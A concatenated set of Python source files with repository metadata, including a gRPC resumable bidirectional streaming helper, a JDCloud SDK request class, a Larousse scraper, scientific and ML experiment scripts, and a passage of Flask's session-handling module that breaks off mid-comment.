should re-establish the stream on error. Example:: def should_recover(exc): return ( isinstance(exc, grpc.RpcError) and exc.code() == grpc.StatusCode.UNVAILABLE) initial_request = example_pb2.StreamingRpcRequest( setting='example') rpc = ResumeableBidiRpc( stub.StreamingRpc, initial_request=initial_request, should_recover=should_recover) rpc.open() while rpc.is_active(): print(rpc.recv()) rpc.send(example_pb2.StreamingRpcRequest( data='example')) Args: start_rpc (grpc.StreamStreamMultiCallable): The gRPC method used to start the RPC. initial_request (Union[protobuf.Message, Callable[None, protobuf.Message]]): The initial request to yield. This is useful if an initial request is needed to start the stream. should_recover (Callable[[Exception], bool]): A function that returns True if the stream should be recovered. This will be called whenever an error is encountered on the stream. """ def __init__(self, start_rpc, should_recover, initial_request=None): super(ResumableBidiRpc, self).__init__(start_rpc, initial_request) self._should_recover = should_recover self._operational_lock = threading.RLock() self._finalized = False self._finalize_lock = threading.Lock() def _finalize(self, result): with self._finalize_lock: if self._finalized: return for callback in self._callbacks: callback(result) self._finalized = True def _on_call_done(self, future): # Unlike the base class, we only execute the callbacks on a terminal # error, not for errors that we can recover from. Note that grpc's # "future" here is also a grpc.RpcError. with self._operational_lock: if not self._should_recover(future): self._finalize(future) else: _LOGGER.debug("Re-opening stream from gRPC callback.") self._reopen() def _reopen(self): with self._operational_lock: # Another thread already managed to re-open this stream. if self.call is not None and self.call.is_active(): _LOGGER.debug("Stream was already re-established.") return self.call = None # Request generator should exit cleanly since the RPC its bound to # has exited. self.request_generator = None # Note: we do not currently do any sort of backoff here. The # assumption is that re-establishing the stream under normal # circumstances will happen in intervals greater than 60s. # However, it is possible in a degenerative case that the server # closes the stream rapidly which would lead to thrashing here, # but hopefully in those cases the server would return a non- # retryable error. try: self.open() # If re-opening or re-calling the method fails for any reason, # consider it a terminal error and finalize the stream. except Exception as exc: _LOGGER.debug("Failed to re-open stream due to %s", exc) self._finalize(exc) raise _LOGGER.info("Re-established stream") def _recoverable(self, method, *args, **kwargs): """Wraps a method to recover the stream and retry on error. If a retryable error occurs while making the call, then the stream will be re-opened and the method will be retried. This happens indefinitely so long as the error is a retryable one. If an error occurs while re-opening the stream, then this method will raise immediately and trigger finalization of this object. Args: method (Callable[..., Any]): The method to call. args: The args to pass to the method. kwargs: The kwargs to pass to the method. """ while True: try: return method(*args, **kwargs) except Exception as exc: with self._operational_lock: _LOGGER.debug("Call to retryable %r caused %s.", method, exc) if not self._should_recover(exc): self.close() _LOGGER.debug("Not retrying %r due to %s.", method, exc) self._finalize(exc) raise exc _LOGGER.debug("Re-opening stream from retryable %r.", method) self._reopen() def _send(self, request): # Grab a reference to the RPC call. Because another thread (notably # the gRPC error thread) can modify self.call (by invoking reopen), # we should ensure our reference can not change underneath us. # If self.call is modified (such as replaced with a new RPC call) then # this will use the "old" RPC, which should result in the same # exception passed into gRPC's error handler being raised here, which # will be handled by the usual error handling in retryable. with self._operational_lock: call = self.call if call is None: raise ValueError("Can not send() on an RPC that has never been open()ed.") # Don't use self.is_active(), as ResumableBidiRpc will overload it # to mean something semantically different. if call.is_active(): self._request_queue.put(request) pass else: # calling next should cause the call to raise. next(call) def send(self, request): return self._recoverable(self._send, request) def _recv(self): with self._operational_lock: call = self.call if call is None: raise ValueError("Can not recv() on an RPC that has never been open()ed.") return next(call) def recv(self): return self._recoverable(self._recv) @property def is_active(self): """bool: True if this stream is currently open and active.""" # Use the operational lock. It's entirely possible for something # to check the active state *while* the RPC is being retried. # Also, use finalized to track the actual terminal state here. # This is because if the stream is re-established by the gRPC thread # it's technically possible to check this between when gRPC marks the # RPC as inactive and when gRPC executes our callback that re-opens # the stream. with self._operational_lock: return self.call is not None and not self._finalized class BackgroundConsumer(object): """A bi-directional stream consumer that runs in a separate thread. This maps the consumption of a stream into a callback-based model. It also provides :func:`pause` and :func:`resume` to allow for flow-control. Example:: def should_recover(exc): return ( isinstance(exc, grpc.RpcError) and exc.code() == grpc.StatusCode.UNVAILABLE) initial_request = example_pb2.StreamingRpcRequest( setting='example') rpc = ResumeableBidiRpc( stub.StreamingRpc, initial_request=initial_request, should_recover=should_recover) def on_response(response): print(response) consumer = BackgroundConsumer(rpc, on_response) consumer.start() Note that error handling *must* be done by using the provided ``bidi_rpc``'s ``add_done_callback``. This helper will automatically exit whenever the RPC itself exits and will not provide any error details. Args: bidi_rpc (BidiRpc): The RPC to consume. Should not have been ``open()``ed yet. on_response (Callable[[protobuf.Message], None]): The callback to be called for every response on the stream. """ def __init__(self, bidi_rpc, on_response): self._bidi_rpc = bidi_rpc self._on_response = on_response self._paused = False self._wake = threading.Condition() self._thread = None self._operational_lock = threading.Lock() def _on_call_done(self, future): # Resume the thread if it's paused, this prevents blocking forever # when the RPC has terminated. self.resume() def _thread_main(self): try: self._bidi_rpc.add_done_callback(self._on_call_done) self._bidi_rpc.open() while self._bidi_rpc.is_active: # Do not allow the paused status to change at all during this # section. There is a condition where we could be resumed # between checking if we are paused and calling wake.wait(), # which means that we will miss the notification to wake up # (oops!) and wait for a notification that will never come. # Keeping the lock throughout avoids that. # In the future, we could use `Condition.wait_for` if we drop # Python 2.7. with self._wake: if self._paused: _LOGGER.debug("paused, waiting for waking.") self._wake.wait() _LOGGER.debug("woken.") _LOGGER.debug("waiting for recv.") response = self._bidi_rpc.recv() _LOGGER.debug("recved response.") self._on_response(response) except exceptions.GoogleAPICallError as exc: _LOGGER.debug( "%s caught error %s and will exit. Generally this is due to " "the RPC itself being cancelled and the error will be " "surfaced to the calling code.", _BIDIRECTIONAL_CONSUMER_NAME, exc, exc_info=True, ) except Exception as exc: _LOGGER.exception( "%s caught unexpected exception %s and will exit.", _BIDIRECTIONAL_CONSUMER_NAME, exc, ) else: _LOGGER.error("The bidirectional RPC exited.") _LOGGER.info("%s exiting", _BIDIRECTIONAL_CONSUMER_NAME) def start(self): """Start the background thread and begin consuming the thread.""" with self._operational_lock: thread = threading.Thread( name=_BIDIRECTIONAL_CONSUMER_NAME, target=self._thread_main ) thread.daemon = True thread.start() self._thread = thread _LOGGER.debug("Started helper thread %s", thread.name) def stop(self): """Stop consuming the stream and shutdown the background thread.""" with self._operational_lock: self._bidi_rpc.close() if self._thread is not None: # Resume the thread to wake it up in case it is sleeping. self.resume() self._thread.join() self._thread = None @property def is_active(self): """bool: True if the background thread is active.""" return self._thread is not None and self._thread.is_alive() def pause(self): """Pauses the response stream. This does *not* pause the request stream. """ with self._wake: self._paused = True def resume(self): """Resumes the response stream.""" with self._wake: self._paused = False self._wake.notifyAll() @property def is_paused(self): """bool: True if the response stream is paused.""" return self._paused
36.908486
86
0.617392
795a8e63478e2a931c91b82db36f0cead58578a9
1,437
py
Python
jdcloud_sdk/services/starshield/apis/ListCertificatePacksRequest.py
jdcloud-apigateway/jdcloud-sdk-python
0886769bcf1fb92128a065ff0f4695be099571cc
[ "Apache-2.0" ]
14
2018-04-19T09:53:56.000Z
2022-01-27T06:05:48.000Z
jdcloud_sdk/services/starshield/apis/ListCertificatePacksRequest.py
jdcloud-apigateway/jdcloud-sdk-python
0886769bcf1fb92128a065ff0f4695be099571cc
[ "Apache-2.0" ]
15
2018-09-11T05:39:54.000Z
2021-07-02T12:38:02.000Z
jdcloud_sdk/services/starshield/apis/ListCertificatePacksRequest.py
jdcloud-apigateway/jdcloud-sdk-python
0886769bcf1fb92128a065ff0f4695be099571cc
[ "Apache-2.0" ]
33
2018-04-20T05:29:16.000Z
2022-02-17T09:10:05.000Z
# coding=utf8 # Copyright 2018 JDCLOUD.COM # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # NOTE: This class is auto generated by the jdcloud code generator program. from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest class ListCertificatePacksRequest(JDCloudRequest): """ 对于给定域,列出所有激活的证书包 """ def __init__(self, parameters, header=None, version="v1"): super(ListCertificatePacksRequest, self).__init__( '/zones/{zone_identifier}/ssl$$certificate_packs', 'GET', header, version) self.parameters = parameters class ListCertificatePacksParameters(object): def __init__(self, zone_identifier, ): """ :param zone_identifier: """ self.zone_identifier = zone_identifier self.status = None def setStatus(self, status): """ :param status: (Optional) 包括所有状态的证书包,而不仅仅是激活状态的证书包。 """ self.status = status
29.326531
86
0.702853
795a8f20b4cd0fcd05adc31bbb77b6c1dfe6b3fc
620
py
Python
larousse_api/larousse.py
quentin-dev/larousse_api
620a907415b0473abd6229c5bb773674781c071e
[ "MIT" ]
3
2020-12-13T21:57:56.000Z
2022-02-03T22:45:15.000Z
larousse_api/larousse.py
elydev01/larousse_api
620a907415b0473abd6229c5bb773674781c071e
[ "MIT" ]
5
2019-10-09T14:40:37.000Z
2020-03-31T08:19:05.000Z
larousse_api/larousse.py
elydev01/larousse_api
620a907415b0473abd6229c5bb773674781c071e
[ "MIT" ]
2
2021-02-28T11:15:32.000Z
2021-11-12T09:37:18.000Z
import requests import re import unicodedata from bs4 import BeautifulSoup def get_definitions(word): """ :param word: The word whose definition you are looking for :return: A list containing all the definitions of word """ url = "https://www.larousse.fr/dictionnaires/francais/" + word.lower() soup = BeautifulSoup(requests.get(url=url).text, 'html.parser') for ul in soup.find_all('ul'): if ul.get('class') is not None and 'Definitions' in ul.get('class'): return [unicodedata.normalize("NFKD", re.sub("<.*?>", "", str(li))) for li in ul.find_all('li')] return []
34.444444
108
0.66129
795a8f734257d6a65fc1f5d2097134b51d0d5e20
898
py
Python
openbts-python/setup.py
cclauss/CommunityCellularManager
4a4e951b03380dcf5f16091d33bc52afbb3eca21
[ "BSD-3-Clause" ]
84
2016-11-03T20:51:09.000Z
2018-09-13T04:36:18.000Z
openbts-python/setup.py
cclauss/CommunityCellularManager
4a4e951b03380dcf5f16091d33bc52afbb3eca21
[ "BSD-3-Clause" ]
79
2016-11-10T06:30:58.000Z
2018-06-01T14:29:39.000Z
openbts-python/setup.py
vbohinc/CommunityCellularManager
ab330fcb1bc70ee3a8e9bcdac2846ab6c327f87c
[ "BSD-3-Clause" ]
37
2016-11-03T22:53:22.000Z
2018-09-07T15:32:16.000Z
""" Copyright (c) 2016-present, Facebook, Inc. All rights reserved. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. An additional grant of patent rights can be found in the PATENTS file in the same directory. """ """The openbts-python package.""" from setuptools import setup with open('readme.md') as f: README = f.read() VERSION = '0.1.15' setup( name='openbts', version=VERSION, description='OpenBTS NodeManager client', long_description=README, url='http://github.com/endaga/openbts-python', download_url=('https://github.com/endaga/openbts-python/tarball/%s' % VERSION), author='Shaddi Hasan', author_email='shasan@fb.com', license='BSD', packages=['openbts'], install_requires=[ "enum34==1.0.4", "envoy==0.0.3", "pyzmq==14.5.0", ], zip_safe=False )
21.902439
75
0.687082
795a8fad2a55fc2516589db8e81dd3ee9ea8ec4d
5,594
py
Python
intersight/models/task_ucs_task5_ref.py
sdnit-se/intersight-python
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
[ "Apache-2.0" ]
21
2018-03-29T14:20:35.000Z
2021-10-13T05:11:41.000Z
intersight/models/task_ucs_task5_ref.py
sdnit-se/intersight-python
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
[ "Apache-2.0" ]
14
2018-01-30T15:45:46.000Z
2022-02-23T14:23:21.000Z
intersight/models/task_ucs_task5_ref.py
sdnit-se/intersight-python
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
[ "Apache-2.0" ]
18
2018-01-03T15:09:56.000Z
2021-07-16T02:21:54.000Z
# coding: utf-8 """ Intersight REST API This is Intersight REST API OpenAPI spec version: 1.0.9-961 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class TaskUcsTask5Ref(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'moid': 'str', 'object_type': 'str', 'selector': 'str' } attribute_map = { 'moid': 'Moid', 'object_type': 'ObjectType', 'selector': 'Selector' } def __init__(self, moid=None, object_type=None, selector=None): """ TaskUcsTask5Ref - a model defined in Swagger """ self._moid = None self._object_type = None self._selector = None if moid is not None: self.moid = moid if object_type is not None: self.object_type = object_type if selector is not None: self.selector = selector @property def moid(self): """ Gets the moid of this TaskUcsTask5Ref. The Moid of the referenced REST resource. :return: The moid of this TaskUcsTask5Ref. :rtype: str """ return self._moid @moid.setter def moid(self, moid): """ Sets the moid of this TaskUcsTask5Ref. The Moid of the referenced REST resource. :param moid: The moid of this TaskUcsTask5Ref. :type: str """ self._moid = moid @property def object_type(self): """ Gets the object_type of this TaskUcsTask5Ref. The Object Type of the referenced REST resource. :return: The object_type of this TaskUcsTask5Ref. :rtype: str """ return self._object_type @object_type.setter def object_type(self, object_type): """ Sets the object_type of this TaskUcsTask5Ref. The Object Type of the referenced REST resource. :param object_type: The object_type of this TaskUcsTask5Ref. :type: str """ self._object_type = object_type @property def selector(self): """ Gets the selector of this TaskUcsTask5Ref. An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. If 'moid' is set this field is ignored. If 'selector' is set and 'moid' is empty/absent from the request, Intersight will determine the Moid of the resource matching the filter expression and populate it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'. :return: The selector of this TaskUcsTask5Ref. :rtype: str """ return self._selector @selector.setter def selector(self, selector): """ Sets the selector of this TaskUcsTask5Ref. An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. If 'moid' is set this field is ignored. If 'selector' is set and 'moid' is empty/absent from the request, Intersight will determine the Moid of the resource matching the filter expression and populate it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'. :param selector: The selector of this TaskUcsTask5Ref. :type: str """ self._selector = selector def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, TaskUcsTask5Ref): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
30.736264
580
0.595459
795a9001970a5ea4321f9a07be5d5977684a56e8
3,136
py
Python
maml_examples/cluster_maml_trpo_cheetah.py
chi6/Model-based-meta-learning-rl
fda134dcbd87ef3e91f339ea2f836f28ec5f7784
[ "MIT" ]
2
2019-09-10T10:13:20.000Z
2020-07-17T01:37:27.000Z
maml_examples/cluster_maml_trpo_cheetah.py
chi6/Model-based-meta-learning-rl
fda134dcbd87ef3e91f339ea2f836f28ec5f7784
[ "MIT" ]
null
null
null
maml_examples/cluster_maml_trpo_cheetah.py
chi6/Model-based-meta-learning-rl
fda134dcbd87ef3e91f339ea2f836f28ec5f7784
[ "MIT" ]
null
null
null
from sandbox.rocky.tf.algos.maml_trpo import MAMLTRPO from rllab.baselines.linear_feature_baseline import LinearFeatureBaseline from rllab.baselines.gaussian_mlp_baseline import GaussianMLPBaseline from rllab.envs.mujoco.half_cheetah_env_rand import HalfCheetahEnvRand from rllab.envs.mujoco.half_cheetah_env_rand_direc import HalfCheetahEnvRandDirec from rllab.envs.normalized_env import normalize from rllab.misc.instrument import stub, run_experiment_lite #from rllab.policies.gaussian_mlp_policy import GaussianMLPPolicy from sandbox.rocky.tf.policies.maml_minimal_gauss_mlp_policy import MAMLGaussianMLPPolicy from sandbox.rocky.tf.envs.base import TfEnv import tensorflow as tf stub(globals()) from rllab.misc.instrument import VariantGenerator, variant class VG(VariantGenerator): @variant def fast_lr(self): return [0.1] @variant def meta_step_size(self): return [0.01] @variant def fast_batch_size(self): return [20] # #10, 20, 40 @variant def meta_batch_size(self): return [40] # at least a total batch size of 400. (meta batch size*fast batch size) @variant def seed(self): return [1] @variant def direc(self): # directionenv vs. goal velocity return [False] # should also code up alternative KL thing variants = VG().variants() max_path_length = 200 num_grad_updates = 1 use_maml=True for v in variants: direc = v['direc'] learning_rate = v['meta_step_size'] if direc: env = TfEnv(normalize(HalfCheetahEnvRandDirec())) else: env = TfEnv(normalize(HalfCheetahEnvRand())) policy = MAMLGaussianMLPPolicy( name="policy", env_spec=env.spec, grad_step_size=v['fast_lr'], hidden_nonlinearity=tf.nn.relu, hidden_sizes=(100,100), ) baseline = LinearFeatureBaseline(env_spec=env.spec) algo = MAMLTRPO( env=env, policy=policy, baseline=baseline, batch_size=v['fast_batch_size'], # number of trajs for grad update max_path_length=max_path_length, meta_batch_size=v['meta_batch_size'], num_grad_updates=num_grad_updates, n_itr=800, use_maml=use_maml, step_size=v['meta_step_size'], plot=False, ) direc = 'direc' if direc else '' run_experiment_lite( algo.train(), exp_prefix='trpo_maml_cheetah' + direc + str(max_path_length), exp_name='maml'+str(int(use_maml))+'_fbs'+str(v['fast_batch_size'])+'_mbs'+str(v['meta_batch_size'])+'_flr_' + str(v['fast_lr']) + '_mlr' + str(v['meta_step_size']), # Number of parallel workers for sampling n_parallel=8, # Only keep the snapshot parameters for the last iteration snapshot_mode="gap", snapshot_gap=25, sync_s3_pkl=True, python_command='python3', # Specifies the seed for the experiment. If this is not provided, a random seed # will be used seed=v["seed"], mode="local", #mode="ec2", variant=v, # plot=True, # terminate_machine=False, )
29.037037
174
0.678253
795a908ea18e039c94c742cc3feee5df15c3ceca
2,949
py
Python
chemicaltoolbox/mordred/mordred_descriptors.py
pavanvidem/galaxytools
339363f6c9d817bc2c35997b4dfdd3ca99a37055
[ "MIT" ]
null
null
null
chemicaltoolbox/mordred/mordred_descriptors.py
pavanvidem/galaxytools
339363f6c9d817bc2c35997b4dfdd3ca99a37055
[ "MIT" ]
null
null
null
chemicaltoolbox/mordred/mordred_descriptors.py
pavanvidem/galaxytools
339363f6c9d817bc2c35997b4dfdd3ca99a37055
[ "MIT" ]
null
null
null
import argparse import numpy as np from mordred import Calculator, descriptors from rdkit import Chem from rdkit.Chem.rdmolfiles import SDMolSupplier def convert_errors_to_nan(el): """ Remove elements from the Mordred dataframe which are not in float or int format """ if type(el) == bool: return int(el) if type(el) not in [float, int, np.float64]: return None return el def mol_supplier(filename, ext): """ Based on the file extension, use the appropriate RDKit function to load a chemical data file (SMILES or SDF) containing multiple molecules and return a list of RDKit Mol objects """ if ext == "sdf": return [n for n in SDMolSupplier(filename)] with open(filename) as f: mols = f.read().split("\n") if ext == "smi": return [Chem.MolFromSmiles(mol, sanitize=True) for mol in mols if mol != ""] if ext == "inchi": return [ Chem.inchi.MolFromInchi(mol, sanitize=True) for mol in mols if mol != "" ] def mordred_descriptors(mols, output, header, use_3d, smi_as_col): """ Calculate Mordred descriptors and save as tabular """ calc = Calculator(descriptors, ignore_3D=(not use_3d)) invalid_mols = np.where(np.array(mols) is None)[ 0 ] # indices of invalid SMILES/SDMols mols = [ Chem.MolFromSmiles("") if n is None else n for n in mols ] # replace invalid mols with placeholder df = calc.pandas(mols, quiet=True) # calculate descriptors for mol in invalid_mols: # remove placeholders df.iloc[mol] = np.nan df = df.applymap(convert_errors_to_nan) # remove descriptors which errored df = df.round(6) if smi_as_col: smiles = [Chem.MolToSmiles(mol) for mol in mols] df["SMILES"] = smiles df.to_csv(output, na_rep="", sep="\t", index=False, header=header) # write output if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-i", "--infile", required=True, help="Path to the input file.") parser.add_argument("--iformat", help="Specify the input file format.") parser.add_argument( "-o", "--outfile", type=argparse.FileType("w+"), help="Path to the result file" ) parser.add_argument( "--3d", dest="use_3d", action="store_true", default=False, help="Use 3d descriptors - only with SDF input.", ) parser.add_argument( "--header", dest="header", action="store_true", default=False, help="Write header line.", ) parser.add_argument( "--smiles", dest="smiles", action="store_true", default=False, help="Add a column with compound SMILES.", ) args = parser.parse_args() mols = mol_supplier(args.infile, args.iformat) mordred_descriptors(mols, args.outfile, args.header, args.use_3d, args.smiles)
30.091837
88
0.630722
795a91537634b5ee6ffe59a10855e1afd271e9e9
1,543
py
Python
sunpy/util/sphinx/changelog.py
tacaswell/sunpy
1e06d75408d1a621749a5d4e743ae44a31886100
[ "BSD-2-Clause" ]
null
null
null
sunpy/util/sphinx/changelog.py
tacaswell/sunpy
1e06d75408d1a621749a5d4e743ae44a31886100
[ "BSD-2-Clause" ]
null
null
null
sunpy/util/sphinx/changelog.py
tacaswell/sunpy
1e06d75408d1a621749a5d4e743ae44a31886100
[ "BSD-2-Clause" ]
null
null
null
import tempfile from docutils import statemachine from docutils.parsers.rst import Directive from sunpy.util.towncrier import generate_changelog_for_docs __all__ = ['ChangeLog'] class ChangeLog(Directive): """ Render the changelog for the current commit using towncrier. This directive renders all the towncrier newsfiles into your current documentation, this can be used to keep a rendered version of the changelog since your last release in your documentation. The directive takes one argument which is the location of your ``pyproject.toml`` file (towncrier configuration) relative to the ``conf.py`` file *not* the file in which the directive is located. If this argument is not specified it defaults to `"../"`. Examples -------- .. code-block:: rst .. changelog:: """ required_arguments = 0 optional_arguments = 1 final_argument_whitespace = True def run(self): config_path = self.arguments[0] or "../" output_file = tempfile.mkstemp()[1] generate_changelog_for_docs(config_path, output_filename=output_file) with open(output_file) as fobj: include_lines = statemachine.string2lines(fobj.read(), convert_whitespace=True) self.state_machine.insert_input(include_lines, "") return [] class DummyChangelog(ChangeLog): def run(self): return [] def setup(app): app.add_directive('changelog', ChangeLog) return {'parallel_read_safe': True, 'parallel_write_safe': True}
27.553571
91
0.701231
795a922c6c3a6a5d1c9b0a8249fec81256ffb0ab
14,276
py
Python
src/flask/sessions.py
wnz27/flask
950801e4d37e44f35cf6d76c9b261d1b4ea6f356
[ "BSD-3-Clause" ]
1
2019-05-31T14:00:53.000Z
2019-05-31T14:00:53.000Z
src/flask/sessions.py
thnee/flask
c791f6312b092678c2a152d0605e49c26831cb05
[ "BSD-3-Clause" ]
null
null
null
src/flask/sessions.py
thnee/flask
c791f6312b092678c2a152d0605e49c26831cb05
[ "BSD-3-Clause" ]
null
null
null
import hashlib import warnings from collections.abc import MutableMapping from datetime import datetime from itsdangerous import BadSignature from itsdangerous import URLSafeTimedSerializer from werkzeug.datastructures import CallbackDict from .helpers import is_ip from .json.tag import TaggedJSONSerializer class SessionMixin(MutableMapping): """Expands a basic dictionary with session attributes.""" @property def permanent(self): """This reflects the ``'_permanent'`` key in the dict.""" return self.get("_permanent", False) @permanent.setter def permanent(self, value): self["_permanent"] = bool(value) #: Some implementations can detect whether a session is newly #: created, but that is not guaranteed. Use with caution. The mixin # default is hard-coded ``False``. new = False #: Some implementations can detect changes to the session and set #: this when that happens. The mixin default is hard coded to #: ``True``. modified = True #: Some implementations can detect when session data is read or #: written and set this when that happens. The mixin default is hard #: coded to ``True``. accessed = True class SecureCookieSession(CallbackDict, SessionMixin): """Base class for sessions based on signed cookies. This session backend will set the :attr:`modified` and :attr:`accessed` attributes. It cannot reliably track whether a session is new (vs. empty), so :attr:`new` remains hard coded to ``False``. """ #: When data is changed, this is set to ``True``. Only the session #: dictionary itself is tracked; if the session contains mutable #: data (for example a nested dict) then this must be set to #: ``True`` manually when modifying that data. The session cookie #: will only be written to the response if this is ``True``. modified = False #: When data is read or written, this is set to ``True``. Used by # :class:`.SecureCookieSessionInterface` to add a ``Vary: Cookie`` #: header, which allows caching proxies to cache different pages for #: different users. accessed = False def __init__(self, initial=None): def on_update(self): self.modified = True self.accessed = True super().__init__(initial, on_update) def __getitem__(self, key): self.accessed = True return super().__getitem__(key) def get(self, key, default=None): self.accessed = True return super().get(key, default) def setdefault(self, key, default=None): self.accessed = True return super().setdefault(key, default) class NullSession(SecureCookieSession): """Class used to generate nicer error messages if sessions are not available. Will still allow read-only access to the empty session but fail on setting. """ def _fail(self, *args, **kwargs): raise RuntimeError( "The session is unavailable because no secret " "key was set. Set the secret_key on the " "application to something unique and secret." ) __setitem__ = __delitem__ = clear = pop = popitem = update = setdefault = _fail del _fail class SessionInterface: """The basic interface you have to implement in order to replace the default session interface which uses werkzeug's securecookie implementation. The only methods you have to implement are :meth:`open_session` and :meth:`save_session`, the others have useful defaults which you don't need to change. The session object returned by the :meth:`open_session` method has to provide a dictionary like interface plus the properties and methods from the :class:`SessionMixin`. We recommend just subclassing a dict and adding that mixin:: class Session(dict, SessionMixin): pass If :meth:`open_session` returns ``None`` Flask will call into :meth:`make_null_session` to create a session that acts as replacement if the session support cannot work because some requirement is not fulfilled. The default :class:`NullSession` class that is created will complain that the secret key was not set. To replace the session interface on an application all you have to do is to assign :attr:`flask.Flask.session_interface`:: app = Flask(__name__) app.session_interface = MySessionInterface() .. versionadded:: 0.8 """ #: :meth:`make_null_session` will look here for the class that should #: be created when a null session is requested. Likewise the #: :meth:`is_null_session` method will perform a typecheck against #: this type. null_session_class = NullSession #: A flag that indicates if the session interface is pickle based. #: This can be used by Flask extensions to make a decision in regards #: to how to deal with the session object. #: #: .. versionadded:: 0.10 pickle_based = False def make_null_session(self, app): """Creates a null session which acts as a replacement object if the real session support could not be loaded due to a configuration error. This mainly aids the user experience because the job of the null session is to still support lookup without complaining but modifications are answered with a helpful error message of what failed. This creates an instance of :attr:`null_session_class` by default. """ return self.null_session_class() def is_null_session(self, obj): """Checks if a given object is a null session. Null sessions are not asked to be saved. This checks if the object is an instance of :attr:`null_session_class` by default. """ return isinstance(obj, self.null_session_class) def get_cookie_name(self, app): """Returns the name of the session cookie. Uses ``app.session_cookie_name`` which is set to ``SESSION_COOKIE_NAME`` """ return app.session_cookie_name def get_cookie_domain(self, app): """Returns the domain that should be set for the session cookie. Uses ``SESSION_COOKIE_DOMAIN`` if it is configured, otherwise falls back to detecting the domain based on ``SERVER_NAME``. Once detected (or if not set at all), ``SESSION_COOKIE_DOMAIN`` is updated to avoid re-running the logic. """ rv = app.config["SESSION_COOKIE_DOMAIN"] # set explicitly, or cached from SERVER_NAME detection # if False, return None if rv is not None: return rv if rv else None rv = app.config["SERVER_NAME"] # server name not set, cache False to return none next time if not rv: app.config["SESSION_COOKIE_DOMAIN"] = False return None # chop off the port which is usually not supported by browsers # remove any leading '.' since we'll add that later rv = rv.rsplit(":", 1)[0].lstrip(".") if "." not in rv: # Chrome doesn't allow names without a '.'. This should only # come up with localhost. Hack around this by not setting # the name, and show a warning. warnings.warn( f"{rv!r} is not a valid cookie domain, it must contain" " a '.'. Add an entry to your hosts file, for example" f" '{rv}.localdomain', and use that instead." ) app.config["SESSION_COOKIE_DOMAIN"] = False return None ip = is_ip(rv) if ip: warnings.warn( "The session cookie domain is an IP address. This may not work" " as intended in some browsers. Add an entry to your hosts" ' file, for example "localhost.localdomain", and use that' " instead." ) # if this is not an ip and app is mounted at the root, allow subdomain # matching by adding a '.' prefix if self.get_cookie_path(app) == "/" and not ip: rv = f".{rv}" app.config["SESSION_COOKIE_DOMAIN"] = rv return rv def get_cookie_path(self, app): """Returns the path for which the cookie should be valid. The default implementation uses the value from the ``SESSION_COOKIE_PATH`` config var if it's set, and falls back to ``APPLICATION_ROOT`` or uses ``/`` if it's ``None``. """ return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] def get_cookie_httponly(self, app): """Returns True if the session cookie should be httponly. This currently just returns the value of the ``SESSION_COOKIE_HTTPONLY`` config var. """ return app.config["SESSION_COOKIE_HTTPONLY"] def get_cookie_secure(self, app): """Returns True if the cookie should be secure. This currently just returns the value of the ``SESSION_COOKIE_SECURE`` setting. """ return app.config["SESSION_COOKIE_SECURE"] def get_cookie_samesite(self, app): """Return ``'Strict'`` or ``'Lax'`` if the cookie should use the ``SameSite`` attribute. This currently just returns the value of the :data:`SESSION_COOKIE_SAMESITE` setting. """ return app.config["SESSION_COOKIE_SAMESITE"] def get_expiration_time(self, app, session): """A helper method that returns an expiration date for the session or ``None`` if the session is linked to the browser session. The default implementation returns now + the permanent session lifetime configured on the application. """ if session.permanent: return datetime.utcnow() + app.permanent_session_lifetime def should_set_cookie(self, app, session): """Used by session backends to determine if a ``Set-Cookie`` header should be set for this session cookie for this response. If the session has been modified, the cookie is set. If the session is permanent and the ``SESSION_REFRESH_EACH_REQUEST`` config is true, the cookie is always set. This check is usually skipped if the session was deleted. .. versionadded:: 0.11 """ return session.modified or ( session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"] ) def open_session(self, app, request): """This method has to be implemented and must either return ``None`` in case the loading failed because of a configuration error or an instance of a session object which implements a dictionary like interface + the methods and attributes on :class:`SessionMixin`. """ raise NotImplementedError() def save_session(self, app, session, response): """This is called for actual sessions returned by :meth:`open_session` at the end of the request. This is still called during a request context so if you absolutely need access to the request you can do that. """ raise NotImplementedError() session_json_serializer = TaggedJSONSerializer() class SecureCookieSessionInterface(SessionInterface): """The default session interface that stores sessions in signed cookies through the :mod:`itsdangerous` module. """ #: the salt that should be applied on top of the secret key for the #: signing of cookie based sessions. salt = "cookie-session" #: the hash function to use for the signature. The default is sha1 digest_method = staticmethod(hashlib.sha1) #: the name of the itsdangerous supported key derivation. The default #: is hmac. key_derivation = "hmac" #: A python serializer for the payload. The default is a compact #: 